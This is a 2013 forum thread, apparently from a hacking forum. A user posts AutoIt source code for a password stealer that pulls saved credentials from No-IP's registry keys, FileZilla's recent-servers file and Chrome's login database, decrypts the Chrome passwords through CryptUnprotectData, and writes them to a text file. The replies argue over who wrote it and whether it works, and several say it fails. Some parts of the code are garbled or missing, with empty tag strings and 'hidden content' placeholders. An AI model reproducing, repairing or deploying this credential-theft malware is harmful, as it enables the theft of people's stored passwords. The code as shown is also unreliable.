FUD Posted May 15, 2013 Share Posted May 15, 2013 (edited) I give you today verry nice code this code get password of no-ip/chrome/filezila code: #comments-start ++++++++++++ autoit stealer +++++++++ write by; njq8 #comments-end #include #include $file=@scriptdir &"\passwords.txt" if fileexists($file) then filedelete($file) $file_handle= fileopen($file ,1) if $file_handle<>-1 then filewrite($file_handle,noip() & chrome() & filezilla() ) fileflush($file_handle) fileclose($file_handle) endif func noip() $usr=regread("hkey_local_machine\software\vitalwerks\duc","username") if $usr="" then return "" $pwd=regread("hkey_local_machine\software\vitalwerks\duc","password") return "url: This is the hidden content, please Sign In or Sign Up " & @crlf & "usr: " & $usr & @crlf & "pwd (base64): " & $pwd & @crlf & @crlf endfunc func filezilla() local $pwds,$h,$fn=envget("appdata") &"\filezilla\recentservers.xml" if fileexists($fn)=false then return "" $h= fileopen($fn,0) if $h=-1 then return "" $host="" $port=21 $usr="" $pass="" while true $line= filereadline($h) if @error = -1 then exitloop if stringinstr($line,"") then $usr="" $pass="" $port=21 $host= stringmid($line,1,stringinstr($line,"")-1) $host= stringmid($host,stringinstr($host,">")+1) endif if stringinstr($line,"") then $port= stringmid($line,1,stringinstr($line,"")-1) $port= stringmid($port,stringinstr($port,">")+1) endif if stringinstr($line,"") then $usr= stringmid($line,1,stringinstr($line,"")-1) $usr= stringmid($usr,stringinstr($usr,">")+1) endif if stringinstr($line,"") then $pass= stringmid($line,1,stringinstr($line,"")-1) $pass= stringmid($pass,stringinstr($pass,">")+1) endif if stringinstr($line,"") then $pwds = $pwds & "url: Ftp://" & $host &":" & $port & @crlf & "usr: " & $usr & @crlf & "pwd: " & $pass & @crlf & @crlf endif wend return $pwds endfunc func chrome() local $q, $r, $pwds,$fn=envget("localappdata") & "\google\chrome\user data\default\login data" if fileexists($fn)=false then return "" _sqlite_startup() _sqlite_open($fn) _sqlite_query(-1, "select * from logins;", $q) while _sqlite_fetchdata($q, $r) = 0 $pwds = $pwds & "url: "& $r[0] & @crlf &"usr: "& $r[3] & @crlf &"pwd: "& uncryptrdppassword( $r[5]) & @crlf & @crlf wend _sqlite_close() _sqlite_shutdown() return $pwds endfunc func uncryptrdppassword($bin) ;this func from >> This is the hidden content, please Sign In or Sign Up local const $cryptprotect_ui_forbidden = 0x1 local const $data_blob = "int;ptr" local $passstr = dllstructcreate("byte[1024]") local $datain = dllstructcreate($data_blob) local $dataout = dllstructcreate($data_blob) $pwdescription = 'psw' $pwdhash = "" dllstructsetdata($dataout, 1, 0) dllstructsetdata($dataout, 2, 0) dllstructsetdata($passstr, 1, $bin) dllstructsetdata($datain, 2, dllstructgetptr($passstr, 1)) dllstructsetdata($datain, 1, binarylen($bin)) $return = dllcall("crypt32.dll","int", "cryptunprotectdata", _ "ptr", dllstructgetptr($datain), _ "ptr", 0, _ "ptr", 0, _ "ptr", 0, _ "ptr", 0, _ "dword", $cryptprotect_ui_forbidden, _ "ptr", dllstructgetptr($dataout)) if @error then return "" $len = dllstructgetdata($dataout, 1) $pwdhash = ptr(dllstructgetdata($dataout, 2)) $pwdhash = dllstructcreate("byte[" & $len & "]", $pwdhash) return binarytostring(dllstructgetdata($pwdhash, 1), 4) endfunc Edited May 15, 2013 by sQuo added original coder Link to comment Share on other sites More sharing options...
SP Posted May 15, 2013 Share Posted May 15, 2013 Re: Autoit Stealer Chrome/NOIP/FileZilla PASSWORD +++++++++ write by; fud ... ????facepalm: +++++++++ Write by; njq8 Link to comment Share on other sites More sharing options...
dR.fAn0 Posted May 31, 2013 Share Posted May 31, 2013 Re: Autoit Stealer Chrome/NOIP/FileZilla PASSWORD Anyone tested yet ?? Link to comment Share on other sites More sharing options...
revengerix Posted June 1, 2013 Share Posted June 1, 2013 Re: Autoit Stealer Chrome/NOIP/FileZilla PASSWORD Seem not working for me..after several try ...create a a empty password txt file ? Link to comment Share on other sites More sharing options...
sammir Posted June 1, 2013 Share Posted June 1, 2013 Re: Autoit Stealer Chrome/NOIP/FileZilla PASSWORD not working here too Link to comment Share on other sites More sharing options...
0b3y Posted June 21, 2013 Share Posted June 21, 2013 Re: Autoit Stealer Chrome/NOIP/FileZilla PASSWORD For me it worked with my ftp... Link to comment Share on other sites More sharing options...
bigmama Posted September 27, 2013 Share Posted September 27, 2013 Re: Autoit Stealer Chrome/NOIP/FileZilla PASSWORD not working here 2 Link to comment Share on other sites More sharing options...
Recommended Posts